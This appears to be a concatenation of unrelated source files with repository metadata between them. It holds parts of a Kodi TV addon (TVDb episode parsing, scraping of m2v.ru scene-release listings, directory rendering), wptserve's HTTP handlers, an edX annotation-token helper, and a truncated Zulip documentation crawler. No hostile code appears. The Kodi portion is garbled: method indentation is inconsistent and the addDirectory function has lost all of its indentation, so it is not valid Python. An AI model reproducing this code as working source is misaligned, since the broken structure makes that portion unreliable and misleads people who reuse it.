            zip = zipfile.ZipFile(StringIO.StringIO(data))
            result = zip.read('%s.xml' % tvdb_lang)
            artwork = zip.read('banners.xml')
            zip.close()
            # item = episode chunks, item2 = the <Series> header chunk
            result = result.split('<Episode>')
            item = [x for x in result if '<EpisodeNumber>' in x]
            item2 = result[0]
            # locate the last watched episode, then take the one after it
            num = [x for x,y in enumerate(item) if re.compile('<SeasonNumber>(.+?)</SeasonNumber>').findall(y)[0] == str(i['season']) and re.compile('<EpisodeNumber>(.+?)</EpisodeNumber>').findall(y)[0] == str(i['episode'])][-1]
            item = [y for x,y in enumerate(item) if x > num][0]
            premiered = client.parseDOM(item, 'FirstAired')[0]
            if premiered == '' or '-00' in premiered: premiered = '0'
            premiered = client.replaceHTMLCodes(premiered)
            premiered = premiered.encode('utf-8')
            try: status = client.parseDOM(item2, 'Status')[0]
            except: status = ''
            if status == '': status = 'Ended'
            status = client.replaceHTMLCodes(status)
            status = status.encode('utf-8')
            # skip the entry when the next episode has not aired yet
            if status == 'Ended': pass
            elif premiered == '0': raise Exception()
            elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
            title = client.parseDOM(item, 'EpisodeName')[0]
            if title == '': title = '0'
            title = client.replaceHTMLCodes(title)
            title = title.encode('utf-8')
            season = client.parseDOM(item, 'SeasonNumber')[0]
            season = '%01d' % int(season)
            season = season.encode('utf-8')
            episode = client.parseDOM(item, 'EpisodeNumber')[0]
            episode = re.sub('[^0-9]', '', '%01d' % int(episode))
            episode = episode.encode('utf-8')
            tvshowtitle = i['tvshowtitle']
            imdb, tmdb, tvdb, tvrage = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage']
            year = i['year']
            try: year = year.encode('utf-8')
            except: pass
            name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
            try: name = name.encode('utf-8')
            except: pass
            # artwork from the series header / episode chunk
            try: poster = client.parseDOM(item2, 'poster')[0]
            except: poster = ''
            if not poster == '': poster = self.tvdb_image + poster
            else: poster = '0'
            poster = client.replaceHTMLCodes(poster)
            poster = poster.encode('utf-8')
            try: banner = client.parseDOM(item2, 'banner')[0]
            except: banner = ''
            if not banner == '': banner = self.tvdb_image + banner
            else: banner = '0'
            banner = client.replaceHTMLCodes(banner)
            banner = banner.encode('utf-8')
            try: fanart = client.parseDOM(item2, 'fanart')[0]
            except: fanart = ''
            if not fanart == '': fanart = self.tvdb_image + fanart
            else: fanart = '0'
            fanart = client.replaceHTMLCodes(fanart)
            fanart = fanart.encode('utf-8')
            try: thumb = client.parseDOM(item, 'filename')[0]
            except: thumb = ''
            if not thumb == '': thumb = self.tvdb_image + thumb
            else: thumb = '0'
            thumb = client.replaceHTMLCodes(thumb)
            thumb = thumb.encode('utf-8')
            # cross-substitute missing artwork
            if not poster == '0': pass
            elif not fanart == '0': poster = fanart
            elif not banner == '0': poster = banner
            if not banner == '0': pass
            elif not fanart == '0': banner = fanart
            elif not poster == '0': banner = poster
            if not thumb == '0': pass
            elif not fanart == '0': thumb = fanart.replace(self.tvdb_image, self.tvdb_poster)
            elif not poster == '0': thumb = poster
            # remaining info labels, all from the TVDb xml
            try: studio = client.parseDOM(item2, 'Network')[0]
            except: studio = ''
            if studio == '': studio = '0'
            studio = client.replaceHTMLCodes(studio)
            studio = studio.encode('utf-8')
            try: alter = client.parseDOM(item2, 'Genre')[0]
            except: alter = '0'
            if any(x in alter for x in ['Documentary', 'Reality', 'Game Show', 'Talk Show']): alter = '1'
            else: alter = '0'
            alter = alter.encode('utf-8')
            try: genre = client.parseDOM(item2, 'Genre')[0]
            except: genre = ''
            genre = [x for x in genre.split('|') if not x == '']
            genre = ' / '.join(genre)
            if genre == '': genre = '0'
            genre = client.replaceHTMLCodes(genre)
            genre = genre.encode('utf-8')
            try: duration = client.parseDOM(item2, 'Runtime')[0]
            except: duration = ''
            if duration == '': duration = '0'
            duration = client.replaceHTMLCodes(duration)
            duration = duration.encode('utf-8')
            try: rating = client.parseDOM(item, 'Rating')[0]
            except: rating = ''
            if rating == '': rating = '0'
            rating = client.replaceHTMLCodes(rating)
            rating = rating.encode('utf-8')
            try: votes = client.parseDOM(item2, 'RatingCount')[0]
            except: votes = '0'
            if votes == '': votes = '0'
            votes = client.replaceHTMLCodes(votes)
            votes = votes.encode('utf-8')
            try: mpaa = client.parseDOM(item2, 'ContentRating')[0]
            except: mpaa = ''
            if mpaa == '': mpaa = '0'
            mpaa = client.replaceHTMLCodes(mpaa)
            mpaa = mpaa.encode('utf-8')
            try: director = client.parseDOM(item, 'Director')[0]
            except: director = ''
            director = [x for x in director.split('|') if not x == '']
            director = ' / '.join(director)
            if director == '': director = '0'
            director = client.replaceHTMLCodes(director)
            director = director.encode('utf-8')
            try: writer = client.parseDOM(item, 'Writer')[0]
            except: writer = ''
            writer = [x for x in writer.split('|') if not x == '']
            writer = ' / '.join(writer)
            if writer == '': writer = '0'
            writer = client.replaceHTMLCodes(writer)
            writer = writer.encode('utf-8')
            try: cast = client.parseDOM(item2, 'Actors')[0]
            except: cast = ''
            cast = [x for x in cast.split('|') if not x == '']
            try: cast = [(x.encode('utf-8'), '') for x in cast]
            except: cast = []
            try: plot = client.parseDOM(item, 'Overview')[0]
            except: plot = ''
            if plot == '':
                try: plot = client.parseDOM(item2, 'Overview')[0]
                except: plot = ''
            if plot == '': plot = '0'
            plot = client.replaceHTMLCodes(plot)
            plot = plot.encode('utf-8')
            # NOTE: self.list.append from worker threads — CPython list
            # append is atomic, so entries are not lost, only unordered.
            self.list.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': director, 'writer': writer, 'cast': cast, 'plot': plot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb, 'action': 'episodes'})
        except:
            pass
    # fetch at most 30 shows, one worker thread each
    items = items[:30]
    threads = []
    for i in items: threads.append(workers.Thread(items_list, i))
    [i.start() for i in threads]
    [i.join() for i in threads]
    try: self.list = sorted(self.list, key=lambda k: k['premiered'], reverse=True)
    except: pass
    return self.list
def scn_list(self, url):
    """
    Scrape the m2v.ru scene-release listing for 'SHOW.SxxEyy' names,
    then fetch the matching trakt calendar span and keep only episodes
    that actually appeared in the scene listing.
    Returns self.list, or None on any failure.
    """
    try:
        result = client.request(url)
        # follow one pagination link (page 2 / PREV) and append its html
        url = client.parseDOM(result, 'a', ret='href', attrs = {'id': 'nav'})
        url = [i for i in url if 'page=2' in i]
        url += re.compile('href="(.+?)".+?>PREV<').findall(result)
        if len(url) > 0:
            url = self.scn_link + '/' + url[0]
            url = client.replaceHTMLCodes(url)
            result += client.request(url)
        result = result.decode('iso-8859-1').encode('utf-8')
        result = client.parseDOM(result, 'tr', attrs = {'class': 'MainTable'})
        # distinct release dates, in page order
        dates = [re.compile('(\d{4}-\d{2}-\d{2})').findall(i) for i in result]
        dates = [i[0] for i in dates if not len(i) == 0]
        dates = [x for y,x in enumerate(dates) if x not in dates[:y]]
        # normalized 'cleantitle SxxEyy' keys for the scene releases
        shows = [client.parseDOM(i, 'a')[0] for i in result]
        shows = [re.compile('(.*)[.](S\d+?E\d+?)[.]').findall(i) for i in shows]
        shows = [(i[0][0].replace('.', ' '), i[0][1]) for i in shows if not len(i) == 0]
        shows = [cleantitle.tv(i[0]) + ' ' + i[1] for i in shows]
        shows = [i.encode('utf-8') for i in shows]
        shows = [x for y,x in enumerate(shows) if x not in shows[:y]]
        # pull the trakt calendar covering the scraped date span, then
        # intersect it with the scene-release keys
        url = self.calendar_link % (str(dates[-1]), len(dates))
        self.list = self.trakt_list(url)
        self.list = [i for i in self.list if '%s S%02dE%02d' % (cleantitle.tv(i['tvshowtitle']), int(i['season']), int(i['episode'])) in shows]
        return self.list
    except:
        return
    def episodeDirectory(self, items):
        """Render a list of episode metadata dicts as a Kodi directory.

        Builds per-episode labels, artwork fallbacks, plugin URLs and
        context menus, then hands the items to Kodi. Items that fail to
        render are skipped silently.
        """
        if items == None or len(items) == 0: return

        # Playback/navigation behaviour depends on addon settings and on
        # whether PseudoTV is currently driving playback.
        isFolder = True if control.setting('autoplay') == 'false' and control.setting('host_select') == '1' else False
        isFolder = False if control.window.getProperty('PseudoTVRunning') == 'True' else isFolder

        playbackMenu = control.lang(30271).encode('utf-8') if control.setting('autoplay') == 'true' else control.lang(30270).encode('utf-8')

        traktMode = False if trakt.getTraktCredentials() == False else True

        cacheToDisc = False

        addonPoster, addonBanner = control.addonPoster(), control.addonBanner()
        addonFanart, settingFanart = control.addonFanart(), control.setting('fanart')

        sysaddon = sys.argv[0]

        # multi == True when the list mixes episodes of several shows, in
        # which case labels get the show title as a prefix.
        try: multi = [i['tvshowtitle'] for i in items]
        except: multi = []
        multi = len([x for y,x in enumerate(multi) if x not in multi[:y]])
        multi = True if multi > 1 else False

        try: sysaction = items[0]['action']
        except: sysaction = ''

        # NOTE(review): if this lookup fails, favitems stays undefined and
        # every item render below fails silently via the per-item except.
        try:
            favitems = favourites.getFavourites('tvshows')
            favitems = [i[0] for i in favitems]
        except:
            pass

        indicators = playcount.getTVShowIndicators(refresh=True)

        # NOTE(review): both branches use the same string id, so the trakt
        # variant of these labels is currently identical — confirm intent.
        watchedMenu = control.lang(30263).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30263).encode('utf-8')
        unwatchedMenu = control.lang(30264).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30264).encode('utf-8')

        for i in items:
            try:
                # '0' is the sentinel for "missing value" in the metadata dicts.
                if i['title'] == '0':
                    label = '%sx%02d . %s %s' % (i['season'], int(i['episode']), 'Episode', i['episode'])
                else:
                    label = '%sx%02d . %s' % (i['season'], int(i['episode']), i['title'])
                if multi == True:
                    label = '%s - %s' % (i['tvshowtitle'], label)

                systitle = sysname = urllib.quote_plus(i['tvshowtitle'])
                episodetitle, episodename = urllib.quote_plus(i['title']), urllib.quote_plus(i['name'])
                syspremiered = urllib.quote_plus(i['premiered'])

                imdb, tmdb, tvdb, tvrage, year, season, episode, alter = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage'], i['year'], i['season'], i['episode'], i['alter']

                poster, banner, fanart, thumb = i['poster'], i['banner'], i['fanart'], i['thumb']
                # Artwork fallbacks: use addon art when the item provides none.
                if poster == '0': poster = addonPoster
                if banner == '0' and poster == '0': banner = addonBanner
                elif banner == '0': banner = poster
                if thumb == '0' and fanart == '0': thumb = addonFanart
                elif thumb == '0': thumb = fanart

                meta = dict((k,v) for k, v in i.iteritems() if not v == '0')
                meta.update({'trailer': '%s?action=trailer&name=%s' % (sysaddon, sysname)})
                # Durations are stored in minutes; Kodi expects seconds.
                if i['duration'] == '0': meta.update({'duration': '60'})
                try: meta.update({'duration': str(int(meta['duration']) * 60)})
                except: pass

                sysmeta = urllib.quote_plus(json.dumps(meta))

                url = '%s?action=play&name=%s&title=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s&tvshowtitle=%s&alter=%s&date=%s&meta=%s&t=%s' % (sysaddon, episodename, episodetitle, year, imdb, tmdb, tvdb, tvrage, season, episode, systitle, alter, syspremiered, sysmeta, self.systime)
                sysurl = urllib.quote_plus(url)
                # Folder mode lists sources instead of playing directly.
                if isFolder == True:
                    url = '%s?action=sources&name=%s&title=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s&tvshowtitle=%s&alter=%s&date=%s&meta=%s' % (sysaddon, episodename, episodetitle, year, imdb, tmdb, tvdb, tvrage, season, episode, systitle, alter, syspremiered, sysmeta)
                if sysaction == 'episodes':
                    url = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage, season, episode)
                    isFolder = True ; cacheToDisc = True

                cm = []
                cm.append((playbackMenu, 'RunPlugin(%s?action=alterSources&url=%s&meta=%s)' % (sysaddon, sysurl, sysmeta)))
                if isFolder == False:
                    cm.append((control.lang(30261).encode('utf-8'), 'RunPlugin(%s?action=queueItem)' % sysaddon))
                cm.append((control.lang(30272).encode('utf-8'), 'Action(Info)'))
                if multi == True:
                    cm.append((control.lang(30274).encode('utf-8'), 'ActivateWindow(Videos,%s?action=seasons&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s,return)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
                # Toggle the watched/unwatched context entry based on the
                # current playcount overlay (7 == watched, 6 == unwatched).
                try:
                    overlay = int(playcount.getEpisodeOverlay(indicators, imdb, tvdb, season, episode))
                    if overlay == 7:
                        cm.append((unwatchedMenu, 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=6)' % (sysaddon, imdb, tvdb, season, episode)))
                        meta.update({'playcount': 1, 'overlay': 7})
                    else:
                        cm.append((watchedMenu, 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=7)' % (sysaddon, imdb, tvdb, season, episode)))
                        meta.update({'playcount': 0, 'overlay': 6})
                except Exception as e:
                    control.log('#episodeDirectory %s' % e)
                    pass
                #cm.append((control.lang(30263).encode('utf-8'), 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=7)' % (sysaddon, imdb, tvdb, season, episode)))
                #cm.append((control.lang(30264).encode('utf-8'), 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=6)' % (sysaddon, imdb, tvdb, season, episode)))
                if traktMode == True:
                    cm.append((control.lang(30265).encode('utf-8'), 'RunPlugin(%s?action=traktManager&name=%s&tvdb=%s&content=tvshow)' % (sysaddon, sysname, tvdb)))
                if not imdb in favitems and not tvdb in favitems: cm.append((control.lang(30266).encode('utf-8'), 'RunPlugin(%s?action=addFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
                else: cm.append((control.lang(30267).encode('utf-8'), 'RunPlugin(%s?action=deleteFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
                cm.append((control.lang(30268).encode('utf-8'), 'RunPlugin(%s?action=tvshowToLibrary&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
                cm.append((control.lang(30273).encode('utf-8'), 'RunPlugin(%s?action=addView&content=episodes)' % sysaddon))

                item = control.item(label=label, iconImage=thumb, thumbnailImage=thumb)
                try: item.setArt({'poster': poster, 'tvshow.poster': poster, 'season.poster': poster, 'banner': banner, 'tvshow.banner': banner, 'season.banner': banner})
                except: pass
                if settingFanart == 'true' and not fanart == '0':
                    item.setProperty('Fanart_Image', fanart)
                elif not addonFanart == None:
                    item.setProperty('Fanart_Image', addonFanart)
                item.setInfo(type='Video', infoLabels = meta)
                item.setProperty('Video', 'true')
                #item.setProperty('IsPlayable', 'true')
                item.setProperty('resumetime',str(0))
                item.setProperty('totaltime',str(1))
                item.addContextMenuItems(cm, replaceItems=True)

                control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=isFolder)
            except:
                pass

        control.content(int(sys.argv[1]), 'episodes')
        control.directory(int(sys.argv[1]), cacheToDisc=cacheToDisc)
        views.setView('episodes', {'skin.confluence': 504})
def addDirectory(self, items):
if items == None or len(items) == 0: return
sysaddon = sys.argv[0]
addonFanart = control.addonFanart()
addonThumb = control.addonThumb()
artPath = control.artPath()
for i in items:
try:
try: name = control.lang(i['name']).encode('utf-8')
except: name = i['name']
if not artPath == None: thumb = os.path.join(artPath, i['image'])
else: thumb = addonThumb
url = '%s?action=%s' % (sysaddon, i['action'])
try: url += '&url=%s' % urllib.quote_plus(i['url'])
except: pass
item = control.item(label=name, iconImage=thumb, thumbnailImage=thumb)
item.addContextMenuItems([], replaceItems=False)
if not addonFanart == None: item.setProperty('Fanart_Image', addonFanart)
control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=True)
except:
pass
control.directory(int(sys.argv[1]), cacheToDisc=True)
| gpl-2.0 |
hujiajie/chromium-crosswalk | third_party/WebKit/Tools/Scripts/webkitpy/thirdparty/wpt/wpt/tools/wptserve/wptserve/handlers.py | 45 | 11370 | import cgi
import json
import os
import traceback
import urllib
import urlparse
from constants import content_types
from pipes import Pipeline, template
from ranges import RangeParser
from request import Authentication
from response import MultipartContent
from utils import HTTPException
__all__ = ["file_handler", "python_script_handler",
"FunctionHandler", "handler", "json_handler",
"as_is_handler", "ErrorHandler", "BasicAuthHandler"]
def guess_content_type(path):
    """Map a filename extension to a MIME type.

    Falls back to application/octet-stream for unknown extensions.
    """
    ext = os.path.splitext(path)[1].lstrip(".")
    if ext not in content_types:
        return "application/octet-stream"
    return content_types[ext]
def filesystem_path(base_path, request, url_base="/"):
    """Resolve a request URL to a filesystem path under *base_path*.

    Defaults to the request's doc_root when *base_path* is None. Raises
    HTTPException(404) for anything that looks like an attempt to escape
    the root directory.
    """
    root = request.doc_root if base_path is None else base_path

    rel = request.url_parts.path
    if rel.startswith(url_base):
        rel = rel[len(url_base):]

    # Reject traversal attempts outright.
    if ".." in rel:
        raise HTTPException(404)

    full_path = os.path.join(root, rel)
    # Otherwise setting path to / allows access outside the root directory.
    if not full_path.startswith(root):
        raise HTTPException(404)

    return full_path
class DirectoryHandler(object):
    """Render an HTML index page for a directory under the document root.

    :param base_path: filesystem root requests are resolved against
                      (defaults to the request's doc_root)
    :param url_base: URL prefix stripped before filesystem resolution
    """
    def __init__(self, base_path=None, url_base="/"):
        self.base_path = base_path
        self.url_base = url_base

    def __call__(self, request, response):
        # Only directory URLs (trailing slash) are listed.
        if not request.url_parts.path.endswith("/"):
            raise HTTPException(404)

        path = filesystem_path(self.base_path, request, self.url_base)

        assert os.path.isdir(path)

        response.headers = [("Content-Type", "text/html")]
        # Bug fix: the list was previously closed with a stray </li>; the
        # element opened here is a <ul>, so close it as such.
        response.content = """<!doctype html>
<meta name="viewport" content="width=device-width">
<title>Directory listing for %(path)s</title>
<h1>Directory listing for %(path)s</h1>
<ul>
%(items)s
</ul>
""" % {"path": cgi.escape(request.url_parts.path),
       "items": "\n".join(self.list_items(request, path))}

    def list_items(self, request, path):
        """Yield one <li> fragment per entry in *path* (plus '..')."""
        # TODO: this won't actually list all routes, only the
        # ones that correspond to a real filesystem path. It's
        # not possible to list every route that will match
        # something, but it should be possible to at least list the
        # statically defined ones
        base_path = request.url_parts.path
        if not base_path.endswith("/"):
            base_path += "/"
        if base_path != "/":
            link = urlparse.urljoin(base_path, "..")
            yield ("""<li class="dir"><a href="%(link)s">%(name)s</a>""" %
                   {"link": link, "name": ".."})
        for item in sorted(os.listdir(path)):
            link = cgi.escape(urllib.quote(item))
            if os.path.isdir(os.path.join(path, item)):
                link += "/"
                class_ = "dir"
            else:
                class_ = "file"
            yield ("""<li class="%(class)s"><a href="%(link)s">%(name)s</a>""" %
                   {"link": link, "name": cgi.escape(item), "class": class_})
directory_handler = DirectoryHandler()
class FileHandler(object):
    """Serve static files from the filesystem, with support for per-file
    ``.headers`` overrides, HTTP Range requests (including multipart
    byteranges) and response pipelines (``?pipe=`` query or ``.sub`` files).
    """
    def __init__(self, base_path=None, url_base="/"):
        self.base_path = base_path
        self.url_base = url_base
        self.directory_handler = DirectoryHandler(self.base_path)

    def __call__(self, request, response):
        path = filesystem_path(self.base_path, request, self.url_base)

        # Directory URLs fall through to the directory listing handler.
        if os.path.isdir(path):
            return self.directory_handler(request, response)
        try:
            #This is probably racy with some other process trying to change the file
            file_size = os.stat(path).st_size
            response.headers.update(self.get_headers(request, path))
            if "Range" in request.headers:
                try:
                    byte_ranges = RangeParser()(request.headers['Range'], file_size)
                except HTTPException as e:
                    # 416 Range Not Satisfiable must advertise the full size.
                    if e.code == 416:
                        response.headers.set("Content-Range", "bytes */%i" % file_size)
                    raise
            else:
                byte_ranges = None
            data = self.get_data(response, path, byte_ranges)
            response.content = data
            query = urlparse.parse_qs(request.url_parts.query)

            pipeline = None
            if "pipe" in query:
                pipeline = Pipeline(query["pipe"][-1])
            elif os.path.splitext(path)[0].endswith(".sub"):
                # foo.sub.html is implicitly run through the 'sub' pipe.
                pipeline = Pipeline("sub")

            if pipeline is not None:
                response = pipeline(request, response)

            return response

        except (OSError, IOError):
            raise HTTPException(404)

    def get_headers(self, request, path):
        """Collect default + directory-wide (__dir__) + per-file headers."""
        rv = self.default_headers(path)
        rv.extend(self.load_headers(request, os.path.join(os.path.split(path)[0], "__dir__")))
        rv.extend(self.load_headers(request, path))
        return rv

    def load_headers(self, request, path):
        """Parse ``<path>.headers`` (or templated ``<path>.sub.headers``)
        into a list of (name, value) tuples; missing files yield []."""
        headers_path = path + ".sub.headers"
        if os.path.exists(headers_path):
            use_sub = True
        else:
            headers_path = path + ".headers"
            use_sub = False

        try:
            with open(headers_path) as headers_file:
                data = headers_file.read()
        except IOError:
            return []
        else:
            if use_sub:
                data = template(request, data)
            return [tuple(item.strip() for item in line.split(":", 1))
                    for line in data.splitlines() if line]

    def get_data(self, response, path, byte_ranges):
        """Read the file body, honouring parsed byte ranges.

        A single range produces a 206 with a Content-Range header; multiple
        ranges produce a multipart/byteranges body.
        """
        with open(path, 'rb') as f:
            if byte_ranges is None:
                return f.read()
            else:
                response.status = 206
                if len(byte_ranges) > 1:
                    parts_content_type, content = self.set_response_multipart(response,
                                                                              byte_ranges,
                                                                              f)
                    for byte_range in byte_ranges:
                        content.append_part(self.get_range_data(f, byte_range),
                                            parts_content_type,
                                            [("Content-Range", byte_range.header_value())])
                    return content
                else:
                    response.headers.set("Content-Range", byte_ranges[0].header_value())
                    return self.get_range_data(f, byte_ranges[0])

    def set_response_multipart(self, response, ranges, f):
        """Switch the response to multipart/byteranges; return the original
        Content-Type (to label each part) and the multipart container."""
        parts_content_type = response.headers.get("Content-Type")
        if parts_content_type:
            parts_content_type = parts_content_type[-1]
        else:
            parts_content_type = None
        content = MultipartContent()
        response.headers.set("Content-Type", "multipart/byteranges; boundary=%s" % content.boundary)
        return parts_content_type, content

    def get_range_data(self, f, byte_range):
        # Ranges are half-open [lower, upper) offsets into the file.
        f.seek(byte_range.lower)
        return f.read(byte_range.upper - byte_range.lower)

    def default_headers(self, path):
        return [("Content-Type", guess_content_type(path))]
file_handler = FileHandler()
class PythonScriptHandler(object):
    """Execute a server-side Python file and dispatch to its
    ``main(request, response)`` function (wptserve ``.py`` handlers)."""
    def __init__(self, base_path=None, url_base="/"):
        self.base_path = base_path
        self.url_base = url_base

    def __call__(self, request, response):
        path = filesystem_path(self.base_path, request, self.url_base)

        try:
            # Run the script in its own namespace; execfile is Python 2 only.
            environ = {"__file__": path}
            execfile(path, environ, environ)
            if "main" in environ:
                handler = FunctionHandler(environ["main"])
                handler(request, response)
            else:
                raise HTTPException(500, "No main function in script %s" % path)
        except IOError:
            raise HTTPException(404)
python_script_handler = PythonScriptHandler()
class FunctionHandler(object):
    """Adapt a plain ``main(request, response)`` function into a handler.

    The wrapped function may mutate *response* directly and return None,
    return the body content, or return ``(headers, content)`` /
    ``(status, headers, content)`` tuples.
    """
    def __init__(self, func):
        self.func = func

    def __call__(self, request, response):
        try:
            rv = self.func(request, response)
        except Exception:
            # Surface the handler's traceback as a 500 so it reaches the log.
            raise HTTPException(500, message=traceback.format_exc())
        if rv is None:
            return
        if not isinstance(rv, tuple):
            response.content = rv
            return
        if len(rv) == 3:
            status, headers, content = rv
            response.status = status
        elif len(rv) == 2:
            headers, content = rv
        else:
            raise HTTPException(500)
        response.headers.update(headers)
        response.content = content
#The generic name here is so that this can be used as a decorator
def handler(func):
    """Wrap *func* as a :class:`FunctionHandler` (usable as ``@handler``)."""
    return FunctionHandler(func)
class JsonHandler(object):
    """Handler wrapper that JSON-encodes the wrapped function's result.

    Sets Content-Type to application/json and Content-Length to the size
    of the encoded body. Tuple return values keep their leading status /
    headers elements; only the final (body) element is encoded.
    """
    def __init__(self, func):
        self.func = func

    def __call__(self, request, response):
        return FunctionHandler(self.handle_request)(request, response)

    def handle_request(self, request, response):
        rv = self.func(request, response)
        response.headers.set("Content-Type", "application/json")
        if isinstance(rv, tuple):
            # Encode only the body; preserve status/headers untouched.
            body = json.dumps(rv[-1])
            value = tuple(rv[:-1]) + (body,)
        else:
            body = json.dumps(rv)
            value = body
        response.headers.set("Content-Length", len(body))
        return value
def json_handler(func):
    """Wrap *func* as a :class:`JsonHandler` (usable as ``@json_handler``)."""
    return JsonHandler(func)
class AsIsHandler(object):
    """Serve a file's bytes verbatim, headers and all (``.asis`` files)."""
    def __init__(self, base_path=None, url_base="/"):
        self.base_path = base_path
        self.url_base = url_base

    def __call__(self, request, response):
        path = filesystem_path(self.base_path, request, self.url_base)

        try:
            with open(path) as f:
                response.writer.write_content(f.read())
            # The raw payload may not frame itself, so close the connection
            # to mark the end of the response.
            response.close_connection = True
        except IOError:
            raise HTTPException(404)
as_is_handler = AsIsHandler()
class BasicAuthHandler(object):
    def __init__(self, handler, user, password):
        """
        A Basic Auth handler

        :Args:
        - handler: a secondary handler for the request after authentication is successful (example file_handler)
        - user: string of the valid user name or None if any / all credentials are allowed
        - password: string of the password required
        """
        self.user = user
        self.password = password
        self.handler = handler

    def __call__(self, request, response):
        if "authorization" not in request.headers:
            # No credentials supplied yet: challenge the client.
            response.status = 401
            response.headers.set("WWW-Authenticate", "Basic")
            return response
        auth = Authentication(request.headers)
        if self.user is not None and (self.user != auth.username or self.password != auth.password):
            response.set_error(403, "Invalid username or password")
            return response
        # Credentials accepted: hand the request to the wrapped handler.
        return self.handler(request, response)
basic_auth_handler = BasicAuthHandler(file_handler, None, None)
class ErrorHandler(object):
    """A handler that always fails with a preconfigured HTTP status code.

    Useful for wiring routes that must unconditionally respond with
    e.g. 404 or 500.
    """
    def __init__(self, status):
        self.status = status

    def __call__(self, request, response):
        # Every request gets the same canned error response.
        response.set_error(self.status)
| bsd-3-clause |
xinjiguaike/edx-platform | common/lib/xmodule/xmodule/annotator_token.py | 211 | 1542 | """
This file contains a function used to retrieve the token for the annotation backend
without having to create a view, but just returning a string instead.
It can be called from other files by using the following:
from xmodule.annotator_token import retrieve_token
"""
import datetime
from firebase_token_generator import create_token
def retrieve_token(userid, secret):
    '''
    Return a signed token for the annotation backend.

    The token embeds the consumer key (``secret``), the user id and an
    issued-at timestamp carrying the local UTC offset, so the backend can
    identify the user and expire the token (ttl of one day, in seconds).
    '''
    # Derive the local UTC offset so isoformat() output gains an explicit
    # timezone suffix; for more information see
    # http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
    local_now = datetime.datetime.now()
    utc_now = datetime.datetime.utcnow()
    offset = local_now - utc_now
    offset_hours, offset_minutes = divmod((offset.days * 24 * 60 * 60 + offset.seconds + 30) // 60, 60)
    issued_at = "%s%+02d:%02d" % (local_now.isoformat(), offset_hours, offset_minutes)

    # The issued time (UTC plus timezone), the consumer key and the user id
    # keep the annotation backend federated across consumers.
    custom_data = {"issuedAt": issued_at, "consumerKey": secret, "userId": userid, "ttl": 86400}
    return create_token(secret, custom_data)
| agpl-3.0 |
TigorC/zulip | tools/documentation_crawler/documentation_crawler/spiders/common/spiders.py | 9 | 3351 | #!/usr/bin/env python
from __future__ import print_function
import logging
import re
import scrapy
from scrapy import Request
from scrapy.linkextractors import IGNORED_EXTENSIONS
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.utils.url import url_has_any_extension
from typing import Any, Generator, List, Optional, Tuple
class BaseDocumentationSpider(scrapy.Spider):
    """Crawl documentation pages, following internal links, HEAD-checking
    external links for existence, and verifying that ``#anchor`` targets
    exist on the pages that carry them."""
    name = None  # type: Optional[str]
    # Exclude domain address.
    deny_domains = []  # type: List[str]
    start_urls = []  # type: List[str]
    deny = ()  # type: Tuple
    file_extensions = ['.' + ext for ext in IGNORED_EXTENSIONS]  # type: List[str]

    def _has_extension(self, url):
        # type: (str) -> bool
        return url_has_any_extension(url, self.file_extensions)

    def _is_external_url(self, url):
        # type: (str) -> bool
        # Absolute http(s) links and file downloads are treated as external:
        # they get an existence check instead of a full crawl.
        return url.startswith('http') or self._has_extension(url)

    def check_existing(self, response):
        # type: (Any) -> None
        # A response arriving at all means the link exists; just log it.
        self.log(response)

    def check_permalink(self, response):
        # type: (Any) -> None
        self.log(response)
        xpath_template = "//*[@id='{permalink}' or @name='{permalink}']"
        m = re.match(r".+\#(?P<permalink>.*)$", response.request.url)  # Get anchor value.
        if not m:
            return
        permalink = m.group('permalink')
        # Check permalink existing on response page.
        if not response.selector.xpath(xpath_template.format(permalink=permalink)):
            raise Exception(
                "Permalink #{} is not found on page {}".format(permalink, response.request.url))

    def parse(self, response):
        # type: (Any) -> Generator[Request, None, None]
        self.log(response)
        for link in LxmlLinkExtractor(deny_domains=self.deny_domains, deny_extensions=[],
                                      deny=self.deny,
                                      canonicalize=False).extract_links(response):
            callback = self.parse  # type: Any
            dont_filter = False
            method = 'GET'
            if self._is_external_url(link.url):
                callback = self.check_existing
                method = 'HEAD'
            elif '#' in link.url:
                # Anchored URLs would be deduplicated away by the scheduler;
                # force scheduling so every anchor gets verified.
                dont_filter = True
                callback = self.check_permalink
            yield Request(link.url, method=method, callback=callback, dont_filter=dont_filter,
                          errback=self.error_callback)

    def retry_request_with_get(self, request):
